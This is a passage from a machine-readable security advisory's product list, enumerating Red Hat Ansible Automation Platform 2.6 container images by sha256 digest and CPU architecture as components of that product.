"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x as a component of Red Hat Ansible Automation Platform 2.6",
